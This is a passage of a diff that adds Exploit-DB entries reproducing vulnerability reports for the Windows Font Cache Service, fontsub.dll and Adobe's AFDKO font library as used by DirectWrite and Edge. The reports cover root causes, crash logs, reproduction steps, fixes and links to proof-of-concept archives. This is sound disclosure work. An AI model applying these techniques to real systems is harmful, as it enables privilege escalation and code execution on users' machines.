+1) Compile the C# project. It’ll need to pull NtApiDotNet from NuGet to build.
+2) As a normal user run the PoC passing the name of a directory to create 
+3) The PoC should print the opened directory and granted access.
+
+Expected Result:
+The file creation 
+
+Observed Result:
+The arbitrary directory was created and is writable by the current user.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47028.zip
\ No newline at end of file
diff --git a/exploits/windows/dos/47029.txt b/exploits/windows/dos/47029.txt
new file mode 100644
index 000000000..95343b32b
--- /dev/null
+++ b/exploits/windows/dos/47029.txt
@@ -0,0 +1,70 @@
+Windows: Windows Font Cache Service Insecure Sections EoP
+Platform: Windows 10 1809 (not tested earlier)
+Class: Elevation of Privilege
+Security Boundary (per Windows Security Service Criteria): User boundary
+
+Summary: 
+
+The Windows Font Cache Service exposes section objects insecurely to low privileged users resulting in EoP.
+
+Description:
+
+The Windows Font Cache Service is used to speed up the performance of DirectWrite font renderer by caching various pieces of font information in a central location. The cache can then be accessed over a custom ALPC connection. In order to support passing back large data sets, such as the cache, the service makes use of memory mapped files. Rather than sharing the sections using a global name the service opens a handle to the calling process (using NtAlpcOpenSenderProcess) then duplicates the section handle into the caller. When the ALPC call returns the caller can pick up the section handle and map it.
+
+Almost certainly for reasons of security the service doesn’t give the caller a section object with SECTION_MAP_WRITE access as it doesn’t want the caller to modify the contents of the cached data, only read from it. Therefore when duplicating the handle it only specifies SECTION_MAP_READ which removes the write access from the handle. Unfortunately there’s a problem, specifically the section objects are created without a name or a security descriptor. This means there’s no security on the object (you can’t even set a security descriptor after creation) which means the caller can just call DuplicateHandle again to get back write access on the section handle, map the section as writeable and modify the contents. This behavior was the topic of my first Project Zero blog post (https://googleprojectzero.blogspot.com/2014/10/did-man-with-no-name-feel-insecure.html) where Chrome had a very similar use case and subsequent vulnerability.
+
+How can this be exploited? The cached data has a lot of complex binary data therefore there’s likely to be some memory corruption vulnerability here as there’s a presumption that only the service could modify the data. That said there does seem to be an enormous number of checks (and checksums) in the code and not being one for fuzzing this is probably a difficult approach. I think the cache also contains file paths, it’s possible that this might be modified to read arbitrary files as there’s an ALPC call to get a file handle, although this would only run at LOCAL SERVICE so it’s not much better than a normal user’s access but might be useful from an AppContainer.
+
+Instead of fuzzing the file format I decided to look elsewhere, there’s another vulnerable section object which is passed back from a call to AlpcServer::ProcessGetEventBufferMessage which seems to be a simple event log in a circular buffer. The service stores the current write location at offset 0x10 into the mapped section. As we can change the section back to write we can modify the offset, cause a logged event to occur and get a memcpy into an address up to 2GB relative to the start of the mapped log inside the service. As the service doesn’t expect this value to be modified by other processes it doesn’t do any bounds checks. For example here’s a crash when setting the pointer to 0x7FFFFFFF:
+
+(2f40.10a4): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+msvcrt!memcpy+0x1cc:
+00007ff8`5dd34a0c 488901          mov     qword ptr [rcx],rax ds:000001ec`931b0043=????????????????
+
+0:002> k
+ # Child-SP          RetAddr           Call Site
+00 00000055`dbfff818 00007ff8`2a8015e2 msvcrt!memcpy+0x1cc
+01 00000055`dbfff820 00007ff8`2a7fb2b9 fntcache!SharedCircularEventSink::LogEvent+0x3d2
+02 00000055`dbfffa00 00007ff8`2a7faf24 fntcache!EventLogger::LogGenericEvent+0x89
+03 00000055`dbfffa70 00007ff8`2a7fabb6 fntcache!AlpcServer::ProcessCacheHandleRequest+0x84
+04 00000055`dbfffb90 00007ff8`2a808c35 fntcache!AlpcServer::ProcessMessage+0x24e
+05 00000055`dbfffc30 00007ff8`2a808b17 fntcache!AlpcServer::Run+0x105
+06 00000055`dbfffce0 00007ff8`5dc181f4 fntcache!AlpcServer::ThreadProc+0x17
+07 00000055`dbfffd30 00007ff8`5f54a251 KERNEL32!BaseThreadInitThunk+0x14
+08 00000055`dbfffd60 00000000`00000000 ntdll!RtlUserThreadStart+0x21
+
+0:002> dc @rcx-7FFFFFFF
+000001ec`131b0044  6961772c 33300a74 2039302f 343a3332  ,wait.03/09 23:4
+000001ec`131b0054  34343a32 3435392e 3530362c 30312c36  2:44.954,6056,10
+000001ec`131b0064  38353030 6361432c 74436568 64612c78  0058,CacheCtx,ad
+000001ec`131b0074  656c4564 69622c6d 70616d74 2f33300a  dElem,bitmap.03/
+000001ec`131b0084  32203930 32343a33 2e34343a 2c343539  09 23:42:44.954,
+000001ec`131b0094  30363234 3030312c 2c393030 63706c41  4260,100009,Alpc
+000001ec`131b00a4  2c727653 74617473 69682c65 33300a74  Svr,state,hit.03
+000001ec`131b00b4  2039302f 343a3332 34343a32 3435392e  /09 23:42:44.954
+
+We can see that RCX is 0x7FFFFFFF above the start of the buffer (the buffer has a 0x44 byte header) and RCX is used at the target of the memcpy call. While we don’t fully control the contents of the write it is at least predictable, bounded in size and therefore almost certainly exploitable. At least this is the best I could find without spending my time reverse engineering the cache format for no real benefit. 
+
+The ALPC server is accessible to all users as well as all AppContainers and Edge LPAC. So this bug could potentially be used to escape the sandbox. There are many questions about this code which I can’t readily answer, like why use raw ALPC rather than RPC or when not use the handle duplication facility of ALPC to pass the handle back rather than relying on duplication (not that it would have made this behavior any safer of course). 
+
+Fixing wise, there’s a few different ways you could go about it. Since Windows 8 all unnamed objects can now enforce a security descriptor as long as it’s specified when creating the new object. Specifying a restrictive DACL the caller won’t have permission to reduplicate back to a writable object. This won’t work on Windows 7 and below (assuming the code goes back that far), you can specify a security descriptor but it’ll be ignored. For 7 you can assign a randomly generated name (or add it to an anonymous directory object then release the directory). For file based sections, such as the caches you could create separate section objects which are only marked for read access and duplicate those which should stop a user converting to writable. Finally you could just directly map the sections into the caller using NtMapViewOfSection which takes a process handle.
+
+Proof of Concept:
+
+I’ve provided a PoC as a C# project. It will query for the event buffer section object over ALPC, duplicate the section object to be writable, modify the current write offset then cause the service to generate a new log entry. This process will result in an OOB memcpy in the service when writing the log entry.
+
+1) Compile the C# project. It’ll need to pull NtApiDotNet from NuGet to build.
+2) Attach a debugger to the Windows Font Cache Service to see the crash.
+3) As a normal user run the PoC.
+
+Expected Result:
+The event buffer section object is read-only.
+
+Observed Result:
+The event buffer section object can be duplicated back to writable and the event buffer modified leading to an arbitrary memcpy in the context of the service.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47029.zip
\ No newline at end of file
diff --git a/exploits/windows/dos/47084.txt b/exploits/windows/dos/47084.txt
new file mode 100644
index 000000000..ddb910716
--- /dev/null
+++ b/exploits/windows/dos/47084.txt
@@ -0,0 +1,72 @@
+-----=====[ Background ]=====-----
+
+The Microsoft Font Subsetting DLL (fontsub.dll) is a default Windows helper library for subsetting TTF fonts; i.e. converting fonts to their more compact versions based on the specific glyphs used in the document where the fonts are embedded. It is used by Windows GDI and Direct2D, and parts of the same code are also found in the t2embed.dll library designed to load and process embedded fonts.
+
+The DLL exposes two API functions: CreateFontPackage and MergeFontPackage. We have developed a testing harness which invokes a pseudo-random sequence of such calls with a chosen font file passed as input. This report describes a crash triggered by a malformed font file in the fontsub.dll code through our harness.
+
+-----=====[ Description ]=====-----
+
+We have encountered the following crash in fontsub!MergeFonts:
+
+--- cut ---
+(5f7c.29fc): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+FONTSUB!MergeFonts+0x774:
+00007fff`aa53b214 413944cd00      cmp     dword ptr [r13+rcx*8],eax ds:0000018a`014e8000=????????
+
+0:000> ? r13
+Evaluate expression: 1692239036224 = 0000018a`014e7f40
+
+0:000> ? rcx
+Evaluate expression: 24 = 00000000`00000018
+
+0:000> ? eax
+Evaluate expression: 1191239935 = 00000000`4700e0ff
+
+0:000> dd r13 r13+18*8-1
+0000018a`014e7f40  68656164 c18e145a 000000cc 00000036
+0000018a`014e7f50  68686561 0bde01ea 00000104 00000024
+0000018a`014e7f60  6d617870 0666d833 00000128 00000020
+0000018a`014e7f70  686d7478 4872344e 00000148 0000016a
+0000018a`014e7f80  636d6170 4079c39a 000002b4 00000996
+0000018a`014e7f90  676c7966 4ec7e46c 00000c4c 00009e8c
+0000018a`014e7fa0  6c6f6361 a4f67e41 0000aad8 00000166
+0000018a`014e7fb0  45424454 fe7d185f 0000b148 00000145
+0000018a`014e7fc0  45424c43 1babe979 0000ac40 00000508
+0000018a`014e7fd0  62646174 fe7d185f 0000b798 00000145
+0000018a`014e7fe0  626c6f63 1babe979 0000b290 00000508
+0000018a`014e7ff0  64747466 74f237b6 0000b8e0 00000176
+
+0:000> !heap -p -a r13
+    address 0000018a014e7f40 found in
+    _DPH_HEAP_ROOT @ 18a01001000
+    in busy allocation (  DPH_HEAP_BLOCK:         UserAddr         UserSize -         VirtAddr         VirtSize)
+                             18a0100f068:      18a014e7f40               c0 -      18a014e7000             2000
+          unknown!printable
+    00007fffcf6530df ntdll!RtlDebugAllocateHeap+0x000000000000003f
+    00007fffcf60b52c ntdll!RtlpAllocateHeap+0x0000000000077d7c
+    00007fffcf59143b ntdll!RtlpAllocateHeapInternal+0x00000000000005cb
+    00007fffb4efbe42 vrfcore!VfCoreRtlAllocateHeap+0x0000000000000022
+    00007fffcca398f0 msvcrt!malloc+0x0000000000000070
+    00007fffaa53fd1e FONTSUB!Mem_Alloc+0x0000000000000012
+    00007fffaa53abbd FONTSUB!MergeFonts+0x000000000000011d
+    00007fffaa53baac FONTSUB!MergeDeltaTTF+0x00000000000003ec
+    00007fffaa5314b2 FONTSUB!MergeFontPackage+0x0000000000000132
+[...]
+
+0:000> k
+ # Child-SP          RetAddr           Call Site
+00 00000079`dc4fd910 00007fff`aa53baac FONTSUB!MergeFonts+0x774
+01 00000079`dc4fdac0 00007fff`aa5314b2 FONTSUB!MergeDeltaTTF+0x3ec
+02 00000079`dc4fdc00 00007ff6`1a8a8a30 FONTSUB!MergeFontPackage+0x132
+[...]
+--- cut ---
+
+The root cause of the crash seems to be an out-of-bounds access to an array storing SFNT table headers.
+
+The issue reproduces on a fully updated Windows 10 1709; we haven't tested earlier versions of the system. It could be potentially used to disclose sensitive data from the process heap. It is easiest to reproduce with PageHeap enabled, but it is also possible to observe a crash in a default system configuration. Attached are 3 proof of concept malformed font files which trigger the crash.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47084.zip
\ No newline at end of file
diff --git a/exploits/windows/dos/47086.txt b/exploits/windows/dos/47086.txt
new file mode 100644
index 000000000..f874ec38e
--- /dev/null
+++ b/exploits/windows/dos/47086.txt
@@ -0,0 +1,150 @@
+----=====[ Background ]=====-----
+
+AFDKO (Adobe Font Development Kit for OpenType) is a set of tools for examining, modifying and building fonts. The core part of this toolset is a font handling library written in C, which provides interfaces for reading and writing Type 1, OpenType, TrueType (to some extent) and several other font formats. While the library existed as early as 2000, it was open-sourced by Adobe in 2014 on GitHub [1, 2], and is still actively developed. The font parsing code can be generally found under afdko/c/public/lib/source/*read/*.c in the project directory tree.
+
+At the time of this writing, based on the available source code, we conclude that AFDKO was originally developed to only process valid, well-formatted font files. It contains very few to no sanity checks of the input data, which makes it susceptible to memory corruption issues (e.g. buffer overflows) and other memory safety problems, if the input file doesn't conform to the format specification.
+
+We have recently discovered that starting with Windows 10 1709 (Fall Creators Update, released in October 2017), Microsoft's DirectWrite library [3] includes parts of AFDKO, and specifically the modules for reading and writing OpenType/CFF fonts (internally called cfr/cfw). The code is reachable through dwrite!AdobeCFF2Snapshot, called by methods of the FontInstancer class, called by dwrite!DWriteFontFace::CreateInstancedStream and dwrite!DWriteFactory::CreateInstancedStream. This strongly indicates that the code is used for instancing the relatively new variable fonts [4], i.e. building a single instance of a variable font with a specific set of attributes. The CreateInstancedStream method is not a member of a public COM interface, but we have found that it is called by d2d1!dxc::TextConvertor::InstanceFontResources, which led us to find out that it can be reached through the Direct2D printing interface. It is unclear if there are other ways to trigger the font instancing functionality.
+
+One example of a client application which uses Direct2D printing is Microsoft Edge. If a user opens a specially crafted website with an embedded OpenType variable font and decides to print it (to PDF, XPS, or another physical or virtual printer), the AFDKO code will execute with the attacker's font file as input. Below is a description of one such security vulnerability in Adobe's library exploitable through the Edge web browser.
+
+-----=====[ Description ]=====-----
+
+The _t2cCtx structure defined in c/public/lib/source/t2cstr/t2cstr.c contains a "cube" array and a "cubeStackDepth" index:
+
+--- cut ---
+    84      int cubeStackDepth;
+    85      float transformMatrix[6];
+    86      struct /* Stem hints */
+    87      {
+    88          float start_x;  /* Path x-coord at start of Cube library element processing */
+    89          float start_y;  /* Path y-coord at start of Cube library element processing */
+    90          float offset_x; /* cube offset, to add to first moveto in cube library element (LE) */
+    91          float offset_y; /* cube offset, to add to first moveto in cube library element (LE)  */
+    92          int nMasters;
+    93          int leIndex;
+    94          int composeOpCnt;
+    95          float composeOpArray[TX_MAX_OP_STACK_CUBE];
+    96          double WV[kMaxCubeMasters]; /* Was originally just 4, to support substitution MM fonts. Note: the PFR rasterizer can support only up to 5 axes */
+    97      } cube[CUBE_LE_STACKDEPTH];
+--- cut ---
+
+The CUBE_LE_STACKDEPTH constant is defined in c/public/lib/resource/txops.h as:
+
+--- cut ---
+   193  #define CUBE_LE_STACKDEPTH 6
+--- cut ---
+
+The "cubeStackDepth" index is incremented in t2Decode() (c/public/lib/source/t2cstr/t2cstr.c), in the handling of the tx_compose operation (number 2):
+
+--- cut ---
+  1318              case tx_compose:
+[...]
+  1365                  h->cubeStackDepth++;
+  1366                  /* copy compose ops to h->cubeOpArray */
+  1367                  h->cube[h->cubeStackDepth].composeOpCnt = h->stack.cnt;
+  1368                  while (h->stack.cnt-- > 0)
+  1369                      h->cube[h->cubeStackDepth].composeOpArray[h->stack.cnt] = h->stack.array[h->stack.cnt];
+  1370                  h->stack.cnt = 0;
+[...]
+--- cut ---
+
+However there is no upper bound check of the value of the field, so by invoking the tx_compose operation several times in a row, it is possible to set it out of bounds. As user-controlled reads and writes can be performed on h->cube[h->cubeStackDepth], this may lead to non-continuous memory corruption and remote code execution. Various members of the _t2cCtx structure make a good target for overwriting, including the interpreter stack index/limit, the cff2/glyph/mem callback pointers etc. Furthermore, the _t2cCtx object itself is declared in the stack frame of the t2cParse() function, so stack frame pointers, return addresses and other control flow information can be corrupted through this vulnerability as well.
+
+-----=====[ Proof of Concept ]=====-----
+
+The proof of concept file triggers the bug upon decoding the instruction stream for letter "A". It calls the only global subroutine (index 0), which then indefinitely, recursively invokes itself through the tx_compose operator, each time incrementing h->cubeStackDepth by one. After several dozen iterations the function reaches the bottom of the stack and crashes with SIGSEGV / ACCESS_VIOLATION while accessing an invalid memory address.
+
+-----=====[ Crash logs ]=====-----
+
+A crash log from the "tx" tool being part of AFDKO, run as ./tx -cff <path to font file>:
+
+--- cut ---
+Program received signal SIGSEGV, Segmentation fault.
+0x000000000045deaa in t2Decode (h=0x7ffffff60188, offset=19147) at ../../../../../source/t2cstr/t2cstr.c:1367
+1367                    h->cube[h->cubeStackDepth].composeOpCnt = h->stack.cnt;
+(gdb) print h->cubeStackDepth
+$1 = 69
+(gdb) print h->cube[h->cubeStackDepth]
+Cannot access memory at address 0x7ffffffff488
+(gdb) print h->cube[h->cubeStackDepth].composeOpCnt
+Cannot access memory at address 0x7ffffffff4a0
+(gdb) x/10i $rip
+=> 0x45deaa <t2Decode+1130>:    mov    %ecx,0x18(%rax)
+   0x45dead <t2Decode+1133>:    mov    -0x18(%rbp),%rax
+   0x45deb1 <t2Decode+1137>:    mov    0x8(%rax),%rcx
+   0x45deb5 <t2Decode+1141>:    mov    %rcx,%rdx
+   0x45deb8 <t2Decode+1144>:    add    $0xffffffffffffffff,%rdx
+   0x45debc <t2Decode+1148>:    mov    %rdx,0x8(%rax)
+   0x45dec0 <t2Decode+1152>:    cmp    $0x0,%rcx
+   0x45dec4 <t2Decode+1156>:    jle    0x45df0e <t2Decode+1230>
+   0x45deca <t2Decode+1162>:    mov    -0x18(%rbp),%rax
+   0x45dece <t2Decode+1166>:    mov    -0x18(%rbp),%rcx
+(gdb) info reg $rax
+rax            0x7ffffffff488   140737488352392
+(gdb)
+--- cut ---
+
+A crash log from the Microsoft Edge renderer process, while trying to print a webpage containing the malformed variable font:
+
+--- cut ---
+(3fa8.3104): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+DWrite!t2Decode+0x203:
+00007ff9`ac0f1777 89943938590000  mov     dword ptr [rcx+rdi+5938h],edx ds:000000d9`a5541448=????????
+
+0:038> !teb
+TEB at 000000d9a274f000
+    ExceptionList:        0000000000000000
+    StackBase:            000000d9a5540000
+    StackLimit:           000000d9a552b000
+
+0:038> ? edx
+Evaluate expression: 4 = 00000000`00000004
+0:038> ? rcx
+Evaluate expression: 64320 = 00000000`0000fb40
+0:038> ? rdi
+Evaluate expression: 934781566928 = 000000d9`a552bfd0
+
+0:038> k
+ # Child-SP          RetAddr           Call Site
+00 000000d9`a552b090 00007ff9`ac0f186e DWrite!t2Decode+0x203
+01 000000d9`a552b1d0 00007ff9`ac0f186e DWrite!t2Decode+0x2fa
+02 000000d9`a552b310 00007ff9`ac0f186e DWrite!t2Decode+0x2fa
+03 000000d9`a552b450 00007ff9`ac0f186e DWrite!t2Decode+0x2fa
+04 000000d9`a552b590 00007ff9`ac0f186e DWrite!t2Decode+0x2fa
+05 000000d9`a552b6d0 00007ff9`ac0f186e DWrite!t2Decode+0x2fa
+06 000000d9`a552b810 00007ff9`ac0f186e DWrite!t2Decode+0x2fa
+07 000000d9`a552b950 00007ff9`ac0f186e DWrite!t2Decode+0x2fa
+08 000000d9`a552ba90 00007ff9`ac0f186e DWrite!t2Decode+0x2fa
+09 000000d9`a552bbd0 00007ff9`ac0f186e DWrite!t2Decode+0x2fa
+0a 000000d9`a552bd10 00007ff9`ac0f1eba DWrite!t2Decode+0x2fa
+0b 000000d9`a552be50 00007ff9`ac0f4a62 DWrite!t2Decode+0x946
+0c 000000d9`a552bf90 00007ff9`ac0dc103 DWrite!t2cParse+0x28e
+0d 000000d9`a553b8f0 00007ff9`ac0de3f7 DWrite!readGlyph+0x12b
+0e 000000d9`a553b960 00007ff9`ac0d2272 DWrite!cfrIterateGlyphs+0x37
+0f 000000d9`a553b9b0 00007ff9`ac06157a DWrite!AdobeCFF2Snapshot+0x19a
+10 000000d9`a553beb0 00007ff9`ac060729 DWrite!FontInstancer::InstanceCffTable+0x212
+11 000000d9`a553c090 00007ff9`ac06039a DWrite!FontInstancer::CreateInstanceInternal+0x249
+12 000000d9`a553c2b0 00007ff9`ac045a4e DWrite!FontInstancer::CreateInstance+0x192
+13 000000d9`a553c610 00007ff9`b71161ab DWrite!DWriteFontFace::CreateInstancedStream+0x9e
+14 000000d9`a553c6a0 00007ff9`b7109148 d2d1!dxc::TextConvertor::InstanceFontResources+0x19f
+15 000000d9`a553c7c0 00007ff9`904e50f4 d2d1!dxc::CXpsPrintControl::Close+0xc8
+16 000000d9`a553c810 00007ff9`904bfcb0 edgehtml!CDXPrintControl::Close+0x44
+17 000000d9`a553c860 00007ff9`904c47ad edgehtml!CTemplatePrinter::EndPrintD2D+0x5c
+18 000000d9`a553c890 00007ff9`9039b515 edgehtml!CPrintManagerTemplatePrinter::endPrint+0x2d
+19 000000d9`a553c8c0 00007ff9`00000000 edgehtml!CFastDOM::CMSPrintManagerTemplatePrinter::Trampoline_endPrint+0x45
+[...]
+--- cut ---
+
+-----=====[ References ]=====-----
+
+[1] https://blog.typekit.com/2014/09/19/new-from-adobe-type-open-sourced-font-development-tools/
+[2] https://github.com/adobe-type-tools/afdko
+[3] https://docs.microsoft.com/en-us/windows/desktop/directwrite/direct-write-portal
+[4] https://medium.com/variable-fonts/https-medium-com-tiro-introducing-opentype-variable-fonts-12ba6cd2369
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47086.zip
\ No newline at end of file
diff --git a/exploits/windows/dos/47087.txt b/exploits/windows/dos/47087.txt
new file mode 100644
index 000000000..b315b5996
--- /dev/null
+++ b/exploits/windows/dos/47087.txt
@@ -0,0 +1,230 @@
+-----=====[ Background ]=====-----
+
+AFDKO (Adobe Font Development Kit for OpenType) is a set of tools for examining, modifying and building fonts. The core part of this toolset is a font handling library written in C, which provides interfaces for reading and writing Type 1, OpenType, TrueType (to some extent) and several other font formats. While the library existed as early as 2000, it was open-sourced by Adobe in 2014 on GitHub [1, 2], and is still actively developed. The font parsing code can be generally found under afdko/c/public/lib/source/*read/*.c in the project directory tree.
+
+At the time of this writing, based on the available source code, we conclude that AFDKO was originally developed to only process valid, well-formatted font files. It contains very few to no sanity checks of the input data, which makes it susceptible to memory corruption issues (e.g. buffer overflows) and other memory safety problems, if the input file doesn't conform to the format specification.
+
+We have recently discovered that starting with Windows 10 1709 (Fall Creators Update, released in October 2017), Microsoft's DirectWrite library [3] includes parts of AFDKO, and specifically the modules for reading and writing OpenType/CFF fonts (internally called cfr/cfw). The code is reachable through dwrite!AdobeCFF2Snapshot, called by methods of the FontInstancer class, called by dwrite!DWriteFontFace::CreateInstancedStream and dwrite!DWriteFactory::CreateInstancedStream. This strongly indicates that the code is used for instancing the relatively new variable fonts [4], i.e. building a single instance of a variable font with a specific set of attributes. The CreateInstancedStream method is not a member of a public COM interface, but we have found that it is called by d2d1!dxc::TextConvertor::InstanceFontResources, which led us to find out that it can be reached through the Direct2D printing interface. It is unclear if there are other ways to trigger the font instancing functionality.
+
+One example of a client application which uses Direct2D printing is Microsoft Edge. If a user opens a specially crafted website with an embedded OpenType variable font and decides to print it (to PDF, XPS, or another physical or virtual printer), the AFDKO code will execute with the attacker's font file as input. Below is a description of one such security vulnerability in Adobe's library exploitable through the Edge web browser.
+
+-----=====[ Description ]=====-----
+
+The _t2cCtx structure defined in c/public/lib/source/t2cstr/t2cstr.c contains a "cube" array and a "cubeStackDepth" index:
+
+--- cut ---
+    84      int cubeStackDepth;
+    85      float transformMatrix[6];
+    86      struct /* Stem hints */
+    87      {
+    88          float start_x;  /* Path x-coord at start of Cube library element processing */
+    89          float start_y;  /* Path y-coord at start of Cube library element processing */
+    90          float offset_x; /* cube offset, to add to first moveto in cube library element (LE) */
+    91          float offset_y; /* cube offset, to add to first moveto in cube library element (LE)  */
+    92          int nMasters;
+    93          int leIndex;
+    94          int composeOpCnt;
+    95          float composeOpArray[TX_MAX_OP_STACK_CUBE];
+    96          double WV[kMaxCubeMasters]; /* Was originally just 4, to support substitution MM fonts. Note: the PFR rasterizer can support only up to 5 axes */
+    97      } cube[CUBE_LE_STACKDEPTH];
+--- cut ---
+
+The "cubeStackDepth" field is initially set to -1 in t2cParse():
+
+--- cut ---
+  2534      h.cubeStackDepth = -1;
+--- cut ---
+
+The value shouldn't be used as an index if it is negative. When the tx_compose operation handler increments it to 0 or a larger value, it also sets the START_COMPOSE flag in h->flags. Most functions check the flag before using cubeStackDepth, for example:
+
+--- cut ---
+   529  /* Callback path move. */
+   530  static void callbackMove(t2cCtx h, float dx, float dy) {
+   531      int flags;
+   532      float x, y;
+   533
+   534      if (h->flags & START_COMPOSE) {
+   535          /* We can tell that this is the first move-to of a flattened compare operator
+   536             with the START_COMPOSE flag.
+   537             dx and dy are the initial moveto values in the LE, usually 0 or a small value.
+   538             h->x and h->y are the current absolute position of the last point in the last path.
+   539             h->le_start.x,y are the LE absolute start position.
+   540           */
+   541          x = dx + h->cube[h->cubeStackDepth].offset_x;
+   542          y = dy + h->cube[h->cubeStackDepth].offset_y;
+   543          h->cube[h->cubeStackDepth].offset_x = 0;
+   544          h->cube[h->cubeStackDepth].offset_y = 0;
+--- cut ---
+
+However, neither the do_set_weight_vector_cube() nor do_blend_cube() functions respect this requirement, and instead assume that cubeStackDepth is greater than 0 when they execute. Below are the first few lines of do_blend_cube():
+
+--- cut ---
+  1054  /* Execute "blend" op. Return 0 on success else error code. */
+  1055  static int do_blend_cube(t2cCtx h, int nBlends) {
+  1056      int i;
+  1057      int nElements = nBlends * h->cube[h->cubeStackDepth].nMasters;
+  1058      int iBase = h->stack.cnt - nElements;
+  1059      int k = iBase + nBlends;
+  1060
+  1061      if (h->cube[h->cubeStackDepth].nMasters <= 1)
+  1062          return t2cErrInvalidWV;
+--- cut ---
+
+The two affected functions subsequently read from and write to the out-of-bounds cube object at h->cube[-1]. In x64 builds of AFDKO, _t2cCtx.cube[-1] overlaps with the _t2cCtx.stack.blendArgs[92] structure, which is uninitialized in typical scenarios, but may also be user-controlled. This may lead to disclosure of uninitialized stack memory, or stack-based memory corruption and remote code execution.
+
+-----=====[ Proof of Concept ]=====-----
+
+The two proof of concept files trigger crashes in the standard "tx" tool compiled with AddressSanitizer and a slightly modified version of the afdko/c/public/lib/source/t2cstr/t2cstr.c file. Our patch adds ASAN redzones in between the fields of the t2cCtx structure, in order to make intra-object out-of-bounds accesses more visible. The PoCs invoke the do_set_weight_vector_cube() and do_blend_cube() functions without first executing a tx_compose instruction. The offending instruction streams are found in the CharStrings for letter "A".
+
+-----=====[ Crash logs ]=====-----
+
+Below, we present crash logs from the 64-bit "tx" tool compiled with ASAN and the redzone patch, run as ./tx -cff <path to font file>.
+
+For do_blend_cube.otf:
+
+--- cut ---
+=================================================================
+==96052==ERROR: AddressSanitizer: use-after-poison on address 0x7ffea1a88890 at pc 0x00000069e6e2 bp 0x7ffea1a46bb0 sp 0x7ffea1a46ba8
+READ of size 4 at 0x7ffea1a88890 thread T0
+    #0 0x69e6e1 in do_blend_cube afdko/c/public/lib/source/t2cstr/t2cstr.c:1057:58
+    #1 0x6855fd in t2Decode afdko/c/public/lib/source/t2cstr/t2cstr.c:1857:38
+    #2 0x670a5b in t2cParse afdko/c/public/lib/source/t2cstr/t2cstr.c:2591:18
+    #3 0x542960 in readGlyph afdko/c/public/lib/source/cffread/cffread.c:2927:14
+    #4 0x541c32 in cfrIterateGlyphs afdko/c/public/lib/source/cffread/cffread.c:2966:9
+    #5 0x509662 in cfrReadFont afdko/c/tx/source/tx.c:151:18
+    #6 0x508cc3 in doFile afdko/c/tx/source/tx.c:429:17
+    #7 0x506b2e in doSingleFileSet afdko/c/tx/source/tx.c:488:5
+    #8 0x4fc91e in parseArgs afdko/c/tx/source/tx.c:558:17
+    #9 0x4f9470 in main afdko/c/tx/source/tx.c:1631:9
+    #10 0x7fa93072e2b0 in __libc_start_main
+    #11 0x41e5b9 in _start
+
+Address 0x7ffea1a88890 is located in stack of thread T0 at offset 241616 in frame
+    #0 0x66eb8f in t2cParse afdko/c/public/lib/source/t2cstr/t2cstr.c:2523
+
+  This frame has 2 object(s):
+    [32, 757896) 'h' (line 2524) <== Memory access at offset 241616 is inside this variable
+    [758160, 758376) 'Exception' (line 2586)
+HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
+      (longjmp and C++ exceptions *are* supported)
+SUMMARY: AddressSanitizer: use-after-poison afdko/c/public/lib/source/t2cstr/t2cstr.c:1057:58 in do_blend_cube
+Shadow bytes around the buggy address:
+  0x1000543490c0: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
+  0x1000543490d0: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
+  0x1000543490e0: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
+  0x1000543490f0: f7 f7 00 f7 f7 f7 f7 00 00 00 00 00 00 00 00 00
+  0x100054349100: 00 00 00 00 00 00 00 f7 f7 f7 f7 00 00 00 00 00
+=>0x100054349110: f7 f7[f7]f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
+  0x100054349120: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
+  0x100054349130: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
+  0x100054349140: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
+  0x100054349150: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
+  0x100054349160: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
+Shadow byte legend (one shadow byte represents 8 application bytes):
+  Addressable:           00
+  Partially addressable: 01 02 03 04 05 06 07
+  Heap left redzone:       fa
+  Freed heap region:       fd
+  Stack left redzone:      f1
+  Stack mid redzone:       f2
+  Stack right redzone:     f3
+  Stack after return:      f5
+  Stack use after scope:   f8
+  Global redzone:          f9
+  Global init order:       f6
+  Poisoned by user:        f7
+  Container overflow:      fc
+  Array cookie:            ac
+  Intra object redzone:    bb
+  ASan internal:           fe
+  Left alloca redzone:     ca
+  Right alloca redzone:    cb
+  Shadow gap:              cc
+==96052==ABORTING
+--- cut ---
+
+Where the t2cstr.c:1057 line is:
+
+--- cut ---
+  1057      int nElements = nBlends * h->cube[h->cubeStackDepth].nMasters;
+--- cut ---
+
+Furthermore, for do_set_weight_vector_cube.otf:
+
+--- cut ---
+=================================================================
+==96231==ERROR: AddressSanitizer: use-after-poison on address 0x7ffe0355a7d8 at pc 0x00000069f2bb bp 0x7ffe0351b9d0 sp 0x7ffe0351b9c8
+READ of size 4 at 0x7ffe0355a7d8 thread T0
+    #0 0x69f2ba in do_set_weight_vector_cube afdko/c/public/lib/source/t2cstr/t2cstr.c:992:49
+    #1 0x6858f1 in t2Decode afdko/c/public/lib/source/t2cstr/t2cstr.c:1883:38
+    #2 0x670a5b in t2cParse afdko/c/public/lib/source/t2cstr/t2cstr.c:2591:18
+    #3 0x542960 in readGlyph afdko/c/public/lib/source/cffread/cffread.c:2927:14
+    #4 0x541c32 in cfrIterateGlyphs afdko/c/public/lib/source/cffread/cffread.c:2966:9
